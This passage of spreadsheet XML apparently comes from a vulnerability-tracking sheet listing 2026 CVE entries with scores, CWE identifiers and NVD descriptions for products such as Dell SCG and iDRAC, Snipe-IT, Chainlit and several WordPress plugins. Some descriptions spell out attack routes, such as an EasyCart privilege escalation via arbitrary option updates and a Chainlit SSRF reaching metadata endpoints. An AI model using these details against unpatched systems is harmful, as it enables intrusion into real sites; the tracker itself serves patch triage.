      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr"/>
      <c r="Q548" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R548"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unauthorized access.</t>
        </is>
      </c>
      <c r="S548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79635</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79692</t>
        </is>
      </c>
      <c r="D549" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E549" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F549" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr"/>
      <c r="K549" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L549" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr"/>
      <c r="Q549" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R549" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an External Control of File Name or Path vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to filesystem access for attacker.</t>
        </is>
      </c>
      <c r="S549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79692</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79695</t>
        </is>
      </c>
      <c r="D550" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E550" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F550" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr"/>
      <c r="Q550" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R550" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Handling of Highly Compressed Data (Data Amplification) vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to denial of service.</t>
        </is>
      </c>
      <c r="S550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79695</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80122</t>
        </is>
      </c>
      <c r="D551" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E551" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F551" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I551" s="5" t="inlineStr"/>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L551" s="5" t="inlineStr"/>
      <c r="M551" s="5" t="inlineStr"/>
      <c r="N551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O551" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr"/>
      <c r="Q551" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R55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S551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80122</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86754</t>
        </is>
      </c>
      <c r="D552" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E552" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G552" s="5" t="inlineStr"/>
      <c r="H552" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I552" s="5" t="inlineStr"/>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L552" s="5" t="inlineStr"/>
      <c r="M552" s="5" t="inlineStr"/>
      <c r="N552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O552" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr"/>
      <c r="Q552" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R552" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly gate Laravel Passport's OAuth client management routes, allowing any authenticated user to register OAuth clients with attacker-controlled redirect URIs. Attackers can trick administrators into approving consent screens, then exchange authorization codes for bearer tokens inheriting full admin API permissions lasting up to 40 years.</t>
        </is>
      </c>
      <c r="S552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86754</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87814</t>
        </is>
      </c>
      <c r="D553" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E553" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I553" s="5" t="inlineStr"/>
      <c r="J553" s="5" t="inlineStr"/>
      <c r="K553" s="5" t="inlineStr"/>
      <c r="L553" s="5" t="inlineStr"/>
      <c r="M553" s="5" t="inlineStr"/>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr"/>
      <c r="Q553" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R553" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in the search asset preview feature that fails to escape indexed asset content before inserting it into the DOM using innerHTML. Attackers who can place crafted text assets in a workspace can execute JavaScript in the SiYuan origin when victims preview the assets, enabling authenticated API requests and workspace manipulation.</t>
        </is>
      </c>
      <c r="S553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87814</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13359</t>
        </is>
      </c>
      <c r="D554" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E554" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F554" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G554" s="5" t="inlineStr"/>
      <c r="H554" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I554" s="5" t="inlineStr"/>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr"/>
      <c r="L554" s="5" t="inlineStr"/>
      <c r="M554" s="5" t="inlineStr"/>
      <c r="N554" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O554" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr"/>
      <c r="Q554" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R554" s="5" t="inlineStr">
        <is>
          <t>The Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via cntctfrm_contact_dropdown Parameter in all versions up to, and including, 1.7.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The injected payload executes in the context of an administrator's browser session when they visit the plugin's message manager page at /wp-admin/admin.php?page=cntctfrmtdb_manager, making it possible to compromise administrator-level sessions via a simple unauthenticated contact form submission.</t>
        </is>
      </c>
      <c r="S554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13359</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14989</t>
        </is>
      </c>
      <c r="D555" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E555" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F555" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I555" s="5" t="inlineStr"/>
      <c r="J555" s="5" t="inlineStr"/>
      <c r="K555" s="5" t="inlineStr"/>
      <c r="L555" s="5" t="inlineStr"/>
      <c r="M555" s="5" t="inlineStr"/>
      <c r="N555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O555" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr"/>
      <c r="Q555" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R555" s="5" t="inlineStr">
        <is>
          <t>The Cookie Banner for GDPR / CCPA – WPLP Cookie Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpl_user_preference' parameter in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The consent-logging AJAX endpoint is registered for unauthenticated users and its required nonce (wpl_consent_logging_nonce) is publicly emitted via wp_localize_script on the frontend, meaning any unauthenticated site visitor can plant a payload without any prior authentication or privileged access.</t>
        </is>
      </c>
      <c r="S555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14989</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17553</t>
        </is>
      </c>
      <c r="D556" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E556" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F556" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I556" s="5" t="inlineStr"/>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr"/>
      <c r="L556" s="5" t="inlineStr"/>
      <c r="M556" s="5" t="inlineStr"/>
      <c r="N556" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O556" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr"/>
      <c r="Q556" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R556" s="5" t="inlineStr">
        <is>
          <t>The WP EasyCart plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.9.3. This is due to the ec_ajax_save_page_default_options() AJAX handler iterating over every $_POST key and passing it directly into update_option() without any allowlist, while gating the handler only on 'manage_options' OR the plugin's custom 'wpec_manager' capability. The plugin's built-in 'wpec_store_manager' role holds 'wpec_manager' but not 'manage_options', and the required nonce is emitted on frontend product/category templates that render for any user with 'wpec_manager'. This makes it possible for authenticated attackers, with Store Manager-level access and above, to elevate their privileges to administrator by updating arbitrary WordPress options such as default_role='administrator' and users_can_register='1', then self-registering a new account that is assigned the administrator role.</t>
        </is>
      </c>
      <c r="S556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17553</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23855</t>
        </is>
      </c>
      <c r="D557" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E557" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F557" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr"/>
      <c r="L557" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr"/>
      <c r="Q557" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R557" s="5" t="inlineStr">
        <is>
          <t>Dell iDRAC9, 14G versions prior to 7.00.00.184, 15G/16G versions prior to 7.30.10.50, and Dell iDRAC10, 17G versions prior to 1.30.30.50, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to command injection.</t>
        </is>
      </c>
      <c r="S557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23855</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45019</t>
        </is>
      </c>
      <c r="D558" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E558" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F558" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I558" s="5" t="inlineStr"/>
      <c r="J558" s="5" t="inlineStr"/>
      <c r="K558" s="5" t="inlineStr"/>
      <c r="L558" s="5" t="inlineStr"/>
      <c r="M558" s="5" t="inlineStr"/>
      <c r="N558" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O558" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr"/>
      <c r="Q558" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R558" s="5" t="inlineStr">
        <is>
          <t>Chainlit is a Python framework for building production-ready conversational AI applications. From 2.4.0rc0 until 2.12.0, Chainlit deployments with features.mcp.enabled set to true in .chainlit/config.toml expose the POST /mcp endpoint without requiring authentication. For sse and streamable-http transports, ConnectSseMCPRequest and ConnectStreamableHttpMCPRequest in backend/chainlit/types.py accept a user-controlled url and optional headers dictionary without scheme validation, private-address filtering, or an allowlist. The connect_mcp handler in backend/chainlit/server.py passes these values to sse_client() or streamablehttp_client(), allowing the Chainlit server to make blind outbound requests to arbitrary internal or external services, including cloud metadata endpoints, with attacker-controlled Authorization and Cookie headers. The SSE URL sink has existed since 2.4.0rc0, while attacker-controlled header forwarding and streamable-http support were added in 2.6.4. The response is consumed internally and not returned, but the attacker can issue state-changing authenticated requests, discover internal services, scan ports, and probe metadata endpoints. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="S558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45019</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53499</t>
        </is>
      </c>
      <c r="D559" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E559" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F559" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I559" s="5" t="inlineStr"/>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr"/>
      <c r="L559" s="5" t="inlineStr"/>
      <c r="M559" s="5" t="inlineStr"/>
      <c r="N559" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O559" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P559" s="5" t="inlineStr"/>
      <c r="Q559" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R559" s="5" t="inlineStr">
        <is>
          <t>FORT Validator is a Resource Public Key Infrastructure (RPKI) relying-party validator that produces validated route-origin data. FORT Validator versions through 1.6.7 contain an origin-validation error in their RRDP processing: a delegated CA under the same Trust Anchor Locator (TAL) can reference a victim CA’s public RRDP notification and snapshot URLs, causing FORT’s URL-based download cache to report success after deleting the victim’s local snapshot. Following a routine victim publication, this can silently remove the victim’s VRPs and other signed objects from FORT’s output, potentially enabling route hijacking or loss of reachability. Version 1.6.8 contains a patch that rejects cross-origin RRDP snapshot and delta URLs; as a workaround, administrators can disable HTTP/RRDP with  --http.enabled=false  while keeping rsync enabled, although this can leave data unavailable or stale where rsync is not supported.</t>
        </is>
      </c>
      <c r="S559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53499</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54718</t>
        </is>
      </c>
      <c r="D560" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E560" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F560" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr"/>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr"/>
      <c r="Q560" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R560" s="5" t="inlineStr">
        <is>
          <t>Silverstripe Advanced Workflow is a highly configurable step-based workflow module. Prior to 6.4.5, 7.1.3, and 7.2.1, an attacker with permission to author the advanced workflow email template can place a specially crafted server-side template payload in NotifyUsersWorkflowAction.EmailTemplate. When NotifyUsersWorkflowAction renders the field through the Silverstripe template engine SSTemplateParser, the payload can cause PHP evaluation and arbitrary code execution on the server; the regression coverage is in tests/php/WorkflowEngineTest.php. This issue is fixed in versions 6.4.5, 7.1.3, and 7.2.1.</t>
        </is>
      </c>
      <c r="S560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54718</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6431</t>
        </is>
      </c>
      <c r="D561" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E561" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F561" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr"/>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr"/>
      <c r="Q561" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R561" s="5" t="inlineStr">
        <is>
          <t>The User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Biographical Info' meta field parameter in all versions up to, and including, 3.15.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6431</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73769</t>
        </is>
      </c>
      <c r="D562" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E562" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F562" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr"/>
      <c r="K562" s="5" t="inlineStr"/>
      <c r="L562" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr"/>
      <c r="Q562" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R562" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of vulnerable CPPM systems could allow an authenticated remote attacker to achieve remote code execution. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="S562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73769</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73787</t>
        </is>
      </c>
      <c r="D563" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E563" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F563" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G563" s="5" t="inlineStr"/>
      <c r="H563" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I563" s="5" t="inlineStr"/>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr"/>
      <c r="L563" s="5" t="inlineStr"/>
      <c r="M563" s="5" t="inlineStr"/>
      <c r="N563" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O563" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr"/>
      <c r="Q563" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R563" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the CPPM web interface could allow an authenticated remote attacker to access directory information on a vulnerable system. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="S563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73787</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75927</t>
        </is>
      </c>
      <c r="D564" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E564" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F564" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I564" s="5" t="inlineStr"/>
